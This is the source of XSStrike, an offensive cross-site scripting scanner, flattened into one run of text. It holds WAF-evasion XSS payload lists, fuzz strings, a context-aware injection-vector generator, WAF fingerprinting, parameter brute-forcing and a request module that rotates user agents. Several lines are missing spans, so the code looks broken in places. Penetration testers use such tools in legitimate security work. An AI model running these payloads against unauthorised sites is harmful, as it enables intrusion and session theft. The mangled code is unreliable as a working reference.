File: #!/usr/bin/env python3 from __future__ import print_function from core.colors import end, red, white, bad, info # Just a fancy ass banner print('''%s \tXSStrike %sv3.1.5 %s''' % (red, white, end)) try: import concurrent.futures from urllib.parse import urlparse try: import fuzzywuzzy except ImportError: import os print ('%s fuzzywuzzy isn\'t installed, installing now.' % info) ret_code = os.system('pip3 install fuzzywuzzy') if(ret_code != 0): print('%s fuzzywuzzy installation failed.' % bad) quit() print ('%s fuzzywuzzy has been installed, restart XSStrike.' % info) quit() except ImportError: # throws error in python2 print('%s XSStrike isn\'t compatible with python2.\n Use python > 3.4 to run XSStrike.' % bad) quit() # Let's import whatever we need from standard lib import sys import json import argparse # ... and configurations core lib import core.config import core.log # Processing command line arguments, where dest var names will be mapped to local vars with the same name parser = argparse.ArgumentParser() parser.add_argument('-u', '--url', help='url', dest='target') parser.add_argument('--data', help='post data', dest='paramData') parser.add_argument('-e', '--encode', help='encode payloads', dest='encode') parser.add_argument('--fuzzer', help='fuzzer', dest='fuzz', action='store_true') parser.add_argument('--update', help='update', dest='update', action='store_true') parser.add_argument('--timeout', help='timeout', dest='timeout', type=int, default=core.config.timeout) parser.add_argument('--proxy', help='use prox(y|ies)', dest='proxy', action='store_true') parser.add_argument('--crawl', help='crawl', dest='recursive', action='store_true') parser.add_argument('--json', help='treat post data as json', dest='jsonData', action='store_true') parser.add_argument('--path', help='inject payloads in the path', dest='path', action='store_true') parser.add_argument( '--seeds', help='load crawling seeds from a file', dest='args_seeds') parser.add_argument( '-f', '--file', help='load payloads from a file', dest='args_file') parser.add_argument('-l', '--level', help='level of crawling', dest='level', type=int, default=2) parser.add_argument('--headers', help='add headers', dest='add_headers', nargs='?', const=True) parser.add_argument('-t', '--threads', help='number of threads', dest='threadCount', type=int, default=core.config.threadCount) parser.add_argument('-d', '--delay', help='delay between requests', dest='delay', type=int, default=core.config.delay) parser.add_argument('--skip', help='don\'t ask to continue', dest='skip', action='store_true') parser.add_argument('--skip-dom', help='skip dom checking', dest='skipDOM', action='store_true') parser.add_argument('--blind', help='inject blind XSS payload while crawling', dest='blindXSS', action='store_true') parser.add_argument('--console-log-level', help='Console logging level', dest='console_log_level', default=core.log.console_log_level, choices=core.log.log_config.keys()) parser.add_argument('--file-log-level', help='File logging level', dest='file_log_level', choices=core.log.log_config.keys(), default=None) parser.add_argument('--log-file', help='Name of the file to log', dest='log_file', default=core.log.log_file) args = parser.parse_args() # Pull all parameter values of dict from argparse namespace into local variables of name == key # The following works, but the static checkers are too static ;-) locals().update(vars(args)) target = path = args.path jsonData = args.jsonData paramData = args.paramData encode = args.encode fuzz = args.fuzz update = args.update timeout = args.timeout proxy = args.proxy recursive = args.recursive args_file = args.args_file args_seeds = args.args_seeds level = args.level add_headers = args.add_headers threadCount = args.threadCount delay = args.delay skip = args.skip skipDOM = args.skipDOM blindXSS = args.blindXSS core.log.console_log_level = args.console_log_level core.log.file_log_level = args.file_log_level core.log.log_file = args.log_file logger = core.log.setup_logger() core.config.globalVariables = vars(args) # Import everything else required from core lib from core.config import blindPayload from core.encoders import base64 from core.photon import photon from core.prompt import prompt from core.updater import updater from core.utils import extractHeaders, reader, converter from modes.bruteforcer import bruteforcer from modes.crawl import crawl from modes.scan import scan from modes.singleFuzz import singleFuzz if type(args.add_headers) == bool: headers = extractHeaders(prompt()) elif type(args.add_headers) == str: headers = extractHeaders(args.add_headers) else: from core.config import headers core.config.globalVariables['headers'] = headers core.config.globalVariables['checkedScripts'] = set() core.config.globalVariables['checkedForms'] = {} core.config.globalVariables['definitions'] = json.loads('\n'.join(reader(sys.path[0] + '/db/definitions.json'))) if path: paramData = converter(target, target) elif jsonData: headers['Content-type'] = 'application/json' paramData = converter(paramData) if args_file: if args_file == 'default': payloadList = core.config.payloads else: payloadList = list(filter(None, reader(args_file))) seedList = [] if args_seeds: seedList = list(filter(None, reader(args_seeds))) encoding = base64 if encode and encode == 'base64' else False if not proxy: core.config.proxies = {} if update: # if the user has supplied --update argument updater() quit() # quitting because files have been changed if not target and not args_seeds: # if the user hasn't supplied a url logger.no_format('\n' + parser.format_help().lower()) quit() if fuzz: singleFuzz(target, paramData, encoding, headers, delay, timeout) elif not recursive and not args_seeds: if args_file: bruteforcer(target, paramData, payloadList, encoding, headers, delay, timeout) else: scan(target, paramData, encoding, headers, delay, timeout, skipDOM, skip) else: if target: seedList.append(target) for target in seedList:'Crawling the target') scheme = urlparse(target).scheme logger.debug('Target scheme: {}'.format(scheme)) host = urlparse(target).netloc main_url = scheme + '://' + host crawlingResult = photon(target, headers, level, threadCount, delay, timeout, skipDOM) forms = crawlingResult[0] domURLs = list(crawlingResult[1]) difference = abs(len(domURLs) - len(forms)) if len(domURLs) > len(forms): for i in range(difference): forms.append(0) elif len(forms) > len(domURLs): for i in range(difference): domURLs.append(0) threadpool = concurrent.futures.ThreadPoolExecutor(max_workers=threadCount) futures = (threadpool.submit(crawl, scheme, host, main_url, form, blindXSS, blindPayload, headers, delay, timeout, encoding) for form, domURL in zip(forms, domURLs)) for i, _ in enumerate(concurrent.futures.as_completed(futures)): if i + 1 == len(forms) or (i + 1) % threadCount == 0:'Progress: %i/%i\r' % (i + 1, len(forms))) logger.no_format('') File: core/ import re def zetanize(response): def e(string): return string.encode('utf-8') def d(string): return string.decode('utf-8') # remove the content between html comments response = re.sub(r'(?s)<!--.*?-->', '', response) forms = {} matches = re.findall(r'(?i)(?s)<form.*?</form.*?>', response) # extract all the forms num = 0 for match in matches: # everything else is self explanatory if you know regex page ='(?i)action=[\'"](.*?)[\'"]', match) method ='(?i)method=[\'"](.*?)[\'"]', match) forms[num] = {} forms[num]['action'] = d(e( if page else '' forms[num]['method'] = d( e( if method else 'get' forms[num]['inputs'] = [] inputs = re.findall(r'(?i)(?s)<input.*?>', response) for inp in inputs: inpName ='(?i)name=[\'"](.*?)[\'"]', inp) if inpName: inpType ='(?i)type=[\'"](.*?)[\'"]', inp) inpValue ='(?i)value=[\'"](.*?)[\'"]', inp) inpName = d(e( inpType = d(e( inpType else '' inpValue = d(e( if inpValue else '' if inpType.lower() == 'submit' and inpValue == '': inpValue = 'Submit Query' inpDict = { 'name': inpName, 'type': inpType, 'value': inpValue } forms[num]['inputs'].append(inpDict) num += 1 return forms File: core/ import json import re import sys from core.requester import requester from core.log import setup_logger logger = setup_logger(__name__) def wafDetector(url, params, headers, GET, delay, timeout): with open(sys.path[0] + '/db/wafSignatures.json', 'r') as file: wafSignatures = json.load(file) # a payload which is noisy enough to provoke the WAF noise = '<script>alert("XSS")</script>' params['xss'] = noise # Opens the noise injected payload response = requester(url, params, headers, GET, delay, timeout) page = response.text code = str(response.status_code) headers = str(response.headers) logger.debug('Waf Detector code: {}'.format(code)) logger.debug_json('Waf Detector headers:', response.headers) if int(code) >= 400: bestMatch = [0, None] for wafName, wafSignature in wafSignatures.items(): score = 0 pageSign = wafSignature['page'] codeSign = wafSignature['code'] headersSign = wafSignature['headers'] if pageSign: if, page, re.I): score += 1 if codeSign: if, code, re.I): score += 0.5 # increase the overall score by a smaller amount because http codes aren't strong indicators if headersSign: if, headers, re.I): score += 1 # if the overall score of the waf is higher than the previous one if score > bestMatch[0]: del bestMatch[:] # delete the previous one bestMatch.extend([score, wafName]) # and add this one if bestMatch[0] != 0: return bestMatch[1] else: return None else: return None File: core/ changes = '''Negligible DOM XSS false positives;x10 faster crawling''' globalVariables = {} # it holds variables during runtime for collaboration across modules defaultEditor = 'nano' blindPayload = '' # your blind XSS payload xsschecker = 'v3dm0s' # A non malicious string to check for reflections and stuff # More information on adding proxies: proxies = {'http': '', 'https': ''} minEfficiency = 90 # payloads below this efficiency will not be displayed delay = 0 # default delay between http requests threadCount = 10 # default number of threads timeout = 10 # default number of http request timeout # attributes that have special properties specialAttributes = ['srcdoc', 'src'] badTags = ('iframe', 'title', 'textarea', 'noembed', 'style', 'template', 'noscript') tags = ('html', 'd3v', 'a', 'details') # HTML Tags # "Things" that can be used between js functions and breakers e.g. '};alert()// jFillings = (';') # "Things" that can be used before > e.g. <tag attr=value%0dx> lFillings = ('', '%0dx') # "Things" to use between event handler and = or between function and = eFillings = ('%09', '%0a', '%0d', '+') fillings = ('%09', '%0a', '%0d', '/+/') # "Things" to use instead of space eventHandlers = { # Event handlers and the tags compatible with them 'ontoggle': ['details'], 'onpointerenter': ['d3v', 'details', 'html', 'a'], 'onmouseover': ['a', 'html', 'd3v'] } functions = ( # JavaScript functions to get a popup '[8].find(confirm)', 'confirm()', '(confirm)()', 'co\u006efir\u006d()', '(prompt)``', 'a=prompt,a()') payloads = ( # Payloads for filter & WAF evasion '\'"</Script><Html Onmouseover=(confirm)()//' '<imG/sRc=l oNerrOr=(prompt)() x>', '<!--<iMg sRc=--><img src=x oNERror=(prompt)`` x>', '<deTails open oNToggle=confi\u0072m()>', '<img sRc=l oNerrOr=(confirm)() x>', '<svg/x=">"/onload=confirm()//', '<svg%0Aonload=%09((pro\u006dpt))()//', '<iMg sRc=x:confirm`` oNlOad=e\u0076al(src)>', '<sCript x>confirm``</scRipt x>', '<Script x>prompt()</scRiPt x>', '<sCriPt sRc=//>', '<embed//sRc=//>', '<base href=//><script src=/>', '<object//data=//>', '<s=" onclick=confirm``>clickme', '<svG oNLoad=co\u006efirm&#x28;1&#x29>', '\'"><y///oNMousEDown=((confirm))()>Click', '<a/href=javascript&colon;co\u006efirm&#40;&quot;1&quot;&#41;>clickme</a>', '<img src=x onerror=confir\u006d`1`>', '<svg/onload=co\u006efir\u006d`1`>') fuzzes = ( # Fuzz strings to test WAFs '<test', '<test//', '<test>', '<test x>', '<test x=y', '<test x=y//', '<test/oNxX=yYy//', '<test oNxX=yYy>', '<test onload=x', '<test/o%00nload=x', '<test sRc=xxx', '<test data=asa', '<test data=javascript:asa', '<svg x=y>', '<details x=y//', '<a href=x//', '<emBed x=y>', '<object x=y//', '<bGsOund sRc=x>', '<iSinDEx x=y//', '<aUdio x=y>', '<script x=y>', '<script//src=//', '">payload<br/attr="', '"-confirm``-"', '<test ONdBlcLicK=x>', '<test/oNcoNTeXtMenU=x>', '<test OndRAgOvEr=x>') headers = { # default headers 'User-Agent': '$', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip,deflate', 'Connection': 'close', 'DNT': '1', 'Upgrade-Insecure-Requests': '1', } blindParams = [ # common paramtere names to be bruteforced for parameter discovery 'redirect', 'redir', 'url', 'link', 'goto', 'debug', '_debug', 'test', 'get', 'index', 'src', 'source', 'file', 'frame', 'config', 'new', 'old', 'var', 'rurl', 'return_to', '_return', 'returl', 'last', 'text', 'load', 'email', 'mail', 'user', 'username', 'password', 'pass', 'passwd', 'first_name', 'last_name', 'back', 'href', 'ref', 'data', 'input', 'out', 'net', 'host', 'address', 'code', 'auth', 'userid', 'auth_token', 'token', 'error', 'keyword', 'key', 'q', 'query', 'aid', 'bid', 'cid', 'did', 'eid', 'fid', 'gid', 'hid', 'iid', 'jid', 'kid', 'lid', 'mid', 'nid', 'oid', 'pid', 'qid', 'rid', 'sid', 'tid', 'uid', 'vid', 'wid', 'xid', 'yid', 'zid', 'cal', 'country', 'x', 'y', 'topic', 'title', 'head', 'higher', 'lower', 'width', 'height', 'add', 'result', 'log', 'demo', 'example', 'message'] File: core/ import re from core.config import badTags, xsschecker from core.utils import isBadContext, equalize, escaped, extractScripts def htmlParser(response, encoding): rawResponse = response # raw response returned by requests response = response.text # response content if encoding: # if the user has specified an encoding, encode the probe in that response = response.replace(encoding(xsschecker), xsschecker) reflections = response.count(xsschecker) position_and_context = {} environment_details = {} clean_response = re.sub(r'<!--[.\s\S]*?-->', '', response) script_checkable = clean_response for script in extractScripts(script_checkable): occurences = re.finditer(r'(%s.*?)$' % xsschecker, script) if occurences: for occurence in occurences: thisPosition = occurence.start(1) position_and_context[thisPosition] = 'script' environment_details[thisPosition] = {} environment_details[thisPosition]['details'] = {'quote' : ''} for i in range(len( currentChar =[i] if currentChar in ('/', '\'', '`', '"') and not escaped(i, environment_details[thisPosition]['details']['quote'] = currentChar elif currentChar in (')', ']', '}', '}') and not escaped(i, break script_checkable = script_checkable.replace(xsschecker, '', 1) if len(position_and_context) < reflections: attribute_context = re.finditer(r'<[^>]*?(%s)[^>]*?>' % xsschecker, clean_response) for occurence in attribute_context: match = thisPosition = occurence.start(1) parts = re.split(r'\s', match) tag = parts[0][1:] for part in parts: if xsschecker in part: Type, quote, name, value = '', '', '', '' if '=' in part: quote ='=([\'`"])?', part).group(1) name_and_value = part.split('=')[0], '='.join(part.split('=')[1:]) if xsschecker == name_and_value[0]: Type = 'name' else: Type = 'value' name = name_and_value[0] value = name_and_value[1].rstrip('>').rstrip(quote).lstrip(quote) else: Type = 'flag' position_and_context[thisPosition] = 'attribute' environment_details[thisPosition] = {} environment_details[thisPosition]['details'] = {'tag' : tag, 'type' : Type, 'quote' : quote, 'value' : value, 'name' : name} if len(position_and_context) < reflections: html_context = re.finditer(xsschecker, clean_response) for occurence in html_context: thisPosition = occurence.start() if thisPosition not in position_and_context: position_and_context[occurence.start()] = 'html' environment_details[thisPosition] = {} environment_details[thisPosition]['details'] = {} if len(position_and_context) < reflections: comment_context = re.finditer(r'<!--[\s\S]*?(%s)[\s\S]*?-->' % xsschecker, response) for occurence in comment_context: thisPosition = occurence.start(1) position_and_context[thisPosition] = 'comment' environment_details[thisPosition] = {} environment_details[thisPosition]['details'] = {} database = {} for i in sorted(position_and_context): database[i] = {} database[i]['position'] = i database[i]['context'] = position_and_context[i] database[i]['details'] = environment_details[i]['details'] bad_contexts = re.finditer(r'(?s)(?i)<(style|template|textarea|title|noembed|noscript)>[.\s\S]*(%s)[.\s\S]*</\1>' % xsschecker, response) non_executable_contexts = [] for each in bad_contexts: non_executable_contexts.append([each.start(), each.end(),]) if non_executable_contexts: for key in database.keys(): position = database[key]['position'] badTag = isBadContext(position, non_executable_contexts) if badTag: database[key]['details']['badTag'] = badTag else: database[key]['details']['badTag'] = '' return database File: core/ import logging from .colors import * __all__ = ['setup_logger', 'console_log_level', 'file_log_level', 'log_file'] console_log_level = 'INFO' file_log_level = None log_file = 'xsstrike.log' """ Default Logging Levels CRITICAL = 50 ERROR = 40 WARNING = 30 INFO = 20 DEBUG = 10 """ VULN_LEVEL_NUM = 60 RUN_LEVEL_NUM = 22 GOOD_LEVEL_NUM = 25 logging.addLevelName(VULN_LEVEL_NUM, 'VULN') logging.addLevelName(RUN_LEVEL_NUM, 'RUN') logging.addLevelName(GOOD_LEVEL_NUM, 'GOOD') def _vuln(self, msg, *args, **kwargs): if self.isEnabledFor(VULN_LEVEL_NUM): self._log(VULN_LEVEL_NUM, msg, args, **kwargs) def _run(self, msg, *args, **kwargs): if self.isEnabledFor(RUN_LEVEL_NUM): self._log(RUN_LEVEL_NUM, msg, args, **kwargs) def _good(self, msg, *args, **kwargs): if self.isEnabledFor(GOOD_LEVEL_NUM): self._log(GOOD_LEVEL_NUM, msg, args, **kwargs) logging.Logger.vuln = _vuln = _run logging.Logger.good = _good log_config = { 'DEBUG': { 'value': logging.DEBUG, 'prefix': '{}[*]{}'.format(yellow, end), }, 'INFO': { 'value': logging.INFO, 'prefix': info, }, 'RUN': { 'value': RUN_LEVEL_NUM, 'prefix': run, }, 'GOOD': { 'value': GOOD_LEVEL_NUM, 'prefix': good, }, 'WARNING': { 'value': logging.WARNING, 'prefix': '[!!]'.format(yellow, end), }, 'ERROR': { 'value': logging.ERROR, 'prefix': bad, }, 'CRITICAL': { 'value': logging.CRITICAL, 'prefix': '{}[--]{}'.format(red, end), }, 'VULN': { 'value': VULN_LEVEL_NUM, 'prefix': '{}[++]{}'.format(green, red), } } class CustomFormatter(logging.Formatter): def format(self, record): msg = super().format(record) if record.levelname in log_config.keys(): msg = '%s %s %s' % (log_config[record.levelname]['prefix'], msg, end) return msg class CustomStreamHandler(logging.StreamHandler): default_terminator = '\n' def emit(self, record): """ Overrides emit method to temporally update terminator character in case last log record character is '\r' :param record: :return: """ if record.msg.endswith('\r'): self.terminator = '\r' super().emit(record) self.terminator = self.default_terminator else: super().emit(record) def _switch_to_no_format_loggers(self): self.removeHandler(self.console_handler) self.addHandler(self.no_format_console_handler) if hasattr(self, 'file_handler') and hasattr(self, 'no_format_file_handler'): self.removeHandler(self.file_handler) self.addHandler(self.no_format_file_handler) def _switch_to_default_loggers(self): self.removeHandler(self.no_format_console_handler) self.addHandler(self.console_handler) if hasattr(self, 'file_handler') and hasattr(self, 'no_format_file_handler'): self.removeHandler(self.no_format_file_handler) self.addHandler(self.file_handler) def _get_level_and_log(self, msg, level): if level.upper() in log_config.keys(): log_method = getattr(self, level.lower()) log_method(msg) else: def log_red_line(self, amount=60, level='INFO'): _switch_to_no_format_loggers(self) _get_level_and_log(self, red + ('-' * amount) + end, level) _switch_to_default_loggers(self) def log_no_format(self, msg='', level='INFO'): _switch_to_no_format_loggers(self) _get_level_and_log(self, msg, level) _switch_to_default_loggers(self) def log_debug_json(self, msg='', data={}): if self.isEnabledFor(logging.DEBUG): if isinstance(data, dict): import json try: self.debug('{} {}'.format(msg, json.dumps(data, indent=2))) except TypeError: self.debug('{} {}'.format(msg, data)) else: self.debug('{} {}'.format(msg, data)) def setup_logger(name='xsstrike'): from types import MethodType logger = logging.getLogger(name) logger.setLevel(logging.DEBUG) console_handler = CustomStreamHandler(sys.stdout) console_handler.setLevel(log_config[console_log_level]['value']) console_handler.setFormatter(CustomFormatter('%(message)s')) logger.addHandler(console_handler) # Setup blank handler to temporally use to log without format no_format_console_handler = CustomStreamHandler(sys.stdout) no_format_console_handler.setLevel((log_config[console_log_level]['value'])) no_format_console_handler.setFormatter(logging.Formatter(fmt='')) # Store current handlers logger.console_handler = console_handler logger.no_format_console_handler = no_format_console_handler if file_log_level: detailed_formatter = logging.Formatter('%(asctime)s %(name)s - %(levelname)s - %(message)s') file_handler = logging.FileHandler(log_file) file_handler.setLevel(log_config[file_log_level]['value']) file_handler.setFormatter(detailed_formatter) logger.addHandler(file_handler) # Setup blank handler to temporally use to log without format no_format_file_handler = logging.FileHandler(log_file) no_format_file_handler.setLevel(log_config[file_log_level]['value']) no_format_file_handler.setFormatter(logging.Formatter(fmt='')) # Store file handlers logger.file_handler = file_handler logger.no_format_file_handler = no_format_file_handler # Create logger method to only log a red line logger.red_line = MethodType(log_red_line, logger) # Create logger method to log without format logger.no_format = MethodType(log_no_format, logger) # Create logger method to convert data to json and log with debug level logger.debug_json = MethodType(log_debug_json, logger) return logger File: core/ File: core/ import base64 as b64 import re def base64(string): if re.match(r'^[A-Za-z0-9+\/=]+$', string) and (len(string) % 4) == 0: return b64.b64decode(string.encode('utf-8')).decode('utf-8') else: return b64.b64encode(string.encode('utf-8')).decode('utf-8') File: core/ import random import requests import time from urllib3.exceptions import ProtocolError import warnings import core.config from core.utils import converter, getVar from core.log import setup_logger logger = setup_logger(__name__) warnings.filterwarnings('ignore') # Disable SSL related warnings def requester(url, data, headers, GET, delay, timeout): if getVar('jsonData'): data = converter(data) elif getVar('path'): url = converter(data, url) data = [] GET, POST = True, False time.sleep(delay) user_agents = ['Mozilla/5.0 (X11; Linux i686; rv:60.0) Gecko/20100101 Firefox/60.0', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36 OPR/43.0.2442.991'] if 'User-Agent' not in headers: headers['User-Agent'] = random.choice(user_agents) elif headers['User-Agent'] == '$': headers['User-Agent'] = random.choice(user_agents) logger.debug('Requester url: {}'.format(url)) logger.debug('Requester GET: {}'.format(GET)) logger.debug_json('Requester data:', data) logger.debug_json('Requester headers:', headers) try: if GET: response = requests.get(url, params=data, headers=headers, timeout=timeout, verify=False, proxies=core.config.proxies) elif getVar('jsonData'): response =, json=data, headers=headers, timeout=timeout, verify=False, proxies=core.config.proxies) else: response =, data=data, headers=headers, timeout=timeout, verify=False, proxies=core.config.proxies) return response except ProtocolError: logger.warning('WAF is dropping suspicious requests.') logger.warning('Scanning will continue after 10 minutes.') time.sleep(600) except Exception as e: logger.warning('Unable to connect to the target.') return requests.Response() File: core/ import os import re from requests import get from core.config import changes from core.colors import que, info, end, green from core.log import setup_logger logger = setup_logger(__name__) def updater():'Checking for updates') latestCommit = get( '').text if changes not in latestCommit: # just a hack to see if a new version is available changelog ="changes = '''(.*?)'''", latestCommit) changelog = ';') # splitting the changes to form a list logger.good('A new version of XSStrike is available.') changes_str = 'Changes:\n' for change in changelog: # prepare changes to print changes_str += '%s>%s %s\n' % (green, end, change) currentPath = os.getcwd().split('/') # if you know it, you know it folder = currentPath[-1] # current directory name path = '/'.join(currentPath) # current directory path choice = input('%s Would you like to update? [Y/n] ' % que).lower() if choice != 'n':'Updating XSStrike') os.system( 'git clone --quiet %s' % (folder)) os.system('cp -r %s/%s/* %s && rm -r %s/%s/ 2>/dev/null' % (path, folder, path, path, folder)) logger.good('Update successful!') else: logger.good('XSStrike is up to date!') File: core/ from core.config import xsschecker, badTags, fillings, eFillings, lFillings, jFillings, eventHandlers, tags, functions from core.jsContexter import jsContexter from core.utils import randomUpper as r, genGen, extractScripts def generator(occurences, response): scripts = extractScripts(response) index = 0 vectors = {11: set(), 10: set(), 9: set(), 8: set(), 7: set(), 6: set(), 5: set(), 4: set(), 3: set(), 2: set(), 1: set()} for i in occurences: context = occurences[i]['context'] if context == 'html': lessBracketEfficiency = occurences[i]['score']['<'] greatBracketEfficiency = occurences[i]['score']['>'] ends = ['//'] badTag = occurences[i]['details']['badTag'] if 'badTag' in occurences[i]['details'] else '' if greatBracketEfficiency == 100: ends.append('>') if lessBracketEfficiency: payloads = genGen(fillings, eFillings, lFillings, eventHandlers, tags, functions, ends, badTag) for payload in payloads: vectors[10].add(payload) elif context == 'attribute': found = False tag = occurences[i]['details']['tag'] Type = occurences[i]['details']['type'] quote = occurences[i]['details']['quote'] or '' attributeName = occurences[i]['details']['name'] attributeValue = occurences[i]['details']['value'] quoteEfficiency = occurences[i]['score'][quote] if quote in occurences[i]['score'] else 100 greatBracketEfficiency = occurences[i]['score']['>'] ends = ['//'] if greatBracketEfficiency == 100: ends.append('>') if greatBracketEfficiency == 100 and quoteEfficiency == 100: payloads = genGen(fillings, eFillings, lFillings, eventHandlers, tags, functions, ends) for payload in payloads: payload = quote + '>' + payload found = True vectors[9].add(payload) if quoteEfficiency == 100: for filling in fillings: for function in functions: vector = quote + filling + r('autofocus') + \ filling + r('onfocus') + '=' + quote + function found = True vectors[8].add(vector) if quoteEfficiency == 90: for filling in fillings: for function in functions: vector = '\\' + quote + filling + r('autofocus') + filling + \ r('onfocus') + '=' + function + filling + '\\' + quote found = True vectors[7].add(vector) if Type == 'value': if attributeName == 'srcdoc': if occurences[i]['score']['&lt;']: if occurences[i]['score']['&gt;']: del ends[:] ends.append('%26gt;') payloads = genGen( fillings, eFillings, lFillings, eventHandlers, tags, functions, ends) for payload in payloads: found = True vectors[9].add(payload.replace('<', '%26lt;')) elif attributeName == 'href' and attributeValue == xsschecker: for function in functions: found = True vectors[10].add(r('javascript:') + function) elif attributeName.startswith('on'): closer = jsContexter(attributeValue) quote = '' for char in attributeValue.split(xsschecker)[1]: if char in ['\'', '"', '`']: quote = char break suffix = '//\\' for filling in jFillings: for function in functions: vector = quote + closer + filling + function + suffix if found: vectors[7].add(vector) else: vectors[9].add(vector) if quoteEfficiency > 83: suffix = '//' for filling in jFillings: for function in functions: if '=' in function: function = '(' + function + ')' if quote == '': filling = '' vector = '\\' + quote + closer + filling + function + suffix if found: vectors[7].add(vector) else: vectors[9].add(vector) elif tag in ('script', 'iframe', 'embed', 'object'): if attributeName in ('src', 'iframe', 'embed') and attributeValue == xsschecker: payloads = ['//', '\\/\\\\\\/\\'] for payload in payloads: vectors[10].add(payload) elif tag == 'object' and attributeName == 'data' and attributeValue == xsschecker: for function in functions: found = True vectors[10].add(r('javascript:') + function) elif quoteEfficiency == greatBracketEfficiency == 100: payloads = genGen(fillings, eFillings, lFillings, eventHandlers, tags, functions, ends) for payload in payloads: payload = quote + '>' + r('</script/>') + payload found = True vectors[11].add(payload) elif context == 'comment': lessBracketEfficiency = occurences[i]['score']['<'] greatBracketEfficiency = occurences[i]['score']['>'] ends = ['//'] if greatBracketEfficiency == 100: ends.append('>') if lessBracketEfficiency == 100: payloads = genGen(fillings, eFillings, lFillings, eventHandlers, tags, functions, ends) for payload in payloads: vectors[10].add(payload) elif context == 'script': if scripts: try: script = scripts[index] except IndexError: script = scripts[0] else: continue closer = jsContexter(script) quote = occurences[i]['details']['quote'] scriptEfficiency = occurences[i]['score']['</scRipT/>'] greatBracketEfficiency = occurences[i]['score']['>'] breakerEfficiency = 100 if quote: breakerEfficiency = occurences[i]['score'][quote] ends = ['//'] if greatBracketEfficiency == 100: ends.append('>') if scriptEfficiency == 100: breaker = r('</script/>') payloads = genGen(fillings, eFillings, lFillings, eventHandlers, tags, functions, ends) for payload in payloads: vectors[10].add(payload) if closer: suffix = '//\\' for filling in jFillings: for function in functions: vector = quote + closer + filling + function + suffix vectors[7].add(vector) elif breakerEfficiency > 83: prefix = '' suffix = '//' if breakerEfficiency != 100: prefix = '\\' for filling in jFillings: for function in functions: if '=' in function: function = '(' + function + ')' if quote == '': filling = '' vector = prefix + quote + closer + filling + function + suffix vectors[6].add(vector) index += 1 return vectors File: core/ import json import random import re from urllib.parse import urlparse import core.config from core.config import xsschecker def converter(data, url=False): if 'str' in str(type(data)): if url: dictized = {} parts = data.split('/')[3:] for part in parts: dictized[part] = part return dictized else: return json.loads(data) else: if url: url = urlparse(url).scheme + '://' + urlparse(url).netloc for part in list(data.values()): url += '/' + part return url else: return json.dumps(data) def counter(string): string = re.sub(r'\s|\w', '', string) return len(string) def closest(number, numbers): difference = [abs(list(numbers.values())[0]), {}] for index, i in numbers.items(): diff = abs(number - i) if diff < difference[0]: difference = [diff, {index: i}] return difference[1] def fillHoles(original, new): filler = 0 filled = [] for x, y in zip(original, new): if int(x) == (y + filler): filled.append(y) else: filled.extend([0, y]) filler += (int(x) - y) return filled def stripper(string, substring, direction='right'): done = False strippedString = '' if direction == 'right': string = string[::-1] for char in string: if char == substring and not done: done = True else: strippedString += char if direction == 'right': strippedString = strippedString[::-1] return strippedString def extractHeaders(headers): headers = headers.replace('\\n', '\n') sorted_headers = {} matches = re.findall(r'(.*):\s(.*)', headers) for match in matches: header = match[0] value = match[1] try: if value[-1] == ',': value = value[:-1] sorted_headers[header] = value except IndexError: pass return sorted_headers def replaceValue(mapping, old, new, strategy=None): """ Replace old values with new ones following dict strategy. The parameter strategy is None per default for inplace operation. A copy operation is injected via strateg values like copy.copy or copy.deepcopy Note: A dict is returned regardless of modifications. """ anotherMap = strategy(mapping) if strategy else mapping if old in anotherMap.values(): for k in anotherMap.keys(): if anotherMap[k] == old: anotherMap[k] = new return anotherMap def getUrl(url, GET): if GET: return url.split('?')[0] else: return url def extractScripts(response): scripts = [] matches = re.findall(r'(?s)<script.*?>(.*?)</script>', response.lower()) for match in matches: if xsschecker in match: scripts.append(match) return scripts def randomUpper(string): return ''.join(random.choice((x, y)) for x, y in zip(string.upper(), string.lower())) def flattenParams(currentParam, params, payload): flatted = [] for name, value in params.items(): if name == currentParam: value = payload flatted.append(name + '=' + value) return '?' + '&'.join(flatted) def genGen(fillings, eFillings, lFillings, eventHandlers, tags, functions, ends, badTag=None): vectors = [] r = randomUpper # randomUpper randomly converts chars of a string to uppercase for tag in tags: if tag == 'd3v' or tag == 'a': bait = xsschecker else: bait = '' for eventHandler in eventHandlers: # if the tag is compatible with the event handler if tag in eventHandlers[eventHandler]: for function in functions: for filling in fillings: for eFilling in eFillings: for lFilling in lFillings: for end in ends: if tag == 'd3v' or tag == 'a': if '>' in ends: end = '>' # we can't use // as > with "a" or "d3v" tag breaker = '' if badTag: breaker = '</' + r(badTag) + '>' vector = breaker + '<' + r(tag) + filling + r( eventHandler) + eFilling + '=' + eFilling + function + lFilling + end + bait vectors.append(vector) return vectors def getParams(url, data, GET): params = {} if '?' in url and '=' in url: data = url.split('?')[1] if data[:1] == '?': data = data[1:] elif data: if getVar('jsonData') or getVar('path'): params = data else: try: params = json.loads(data.replace('\'', '"')) return params except json.decoder.JSONDecodeError: pass else: return None if not params: parts = data.split('&') for part in parts: each = part.split('=') if len(each) < 2: each.append('') try: params[each[0]] = each[1] except IndexError: params = None return params def writer(obj, path): kind = str(type(obj)).split('\'')[0] if kind == 'list' or kind == 'tuple': obj = '\n'.join(obj) elif kind == 'dict': obj = json.dumps(obj, indent=4) savefile = open(path, 'w+') savefile.write(str(obj.encode('utf-8'))) savefile.close() def reader(path): with open(path, 'r') as f: result = [line.rstrip( '\n').encode('utf-8').decode('utf-8') for line in f] return result def js_extractor(response): """Extract js files from the response body""" scripts = [] matches = re.findall(r'<(?:script|SCRIPT).*?(?:src|SRC)=([^\s>]+)', response) for match in matches: match = match.replace('\'', '').replace('"', '').replace('`', '') scripts.append(match) return scripts def handle_anchor(parent_url, url): scheme = urlparse(parent_url).scheme if url[:4] == 'http': return url elif url[:2] == '//': return scheme + ':' + url elif url.startswith('/'): host = urlparse(parent_url).netloc scheme = urlparse(parent_url).scheme parent_url = scheme + '://' + host return parent_url + url elif parent_url.endswith('/'): return parent_url + url else: return parent_url + '/' + url def deJSON(data): return data.replace('\\\\', '\\') def getVar(name): return core.config.globalVariables[name] def updateVar(name, data, mode=None): if mode: if mode == 'append': core.config.globalVariables[name].append(data) elif mode == 'add': core.config.globalVariables[name].add(data) else: 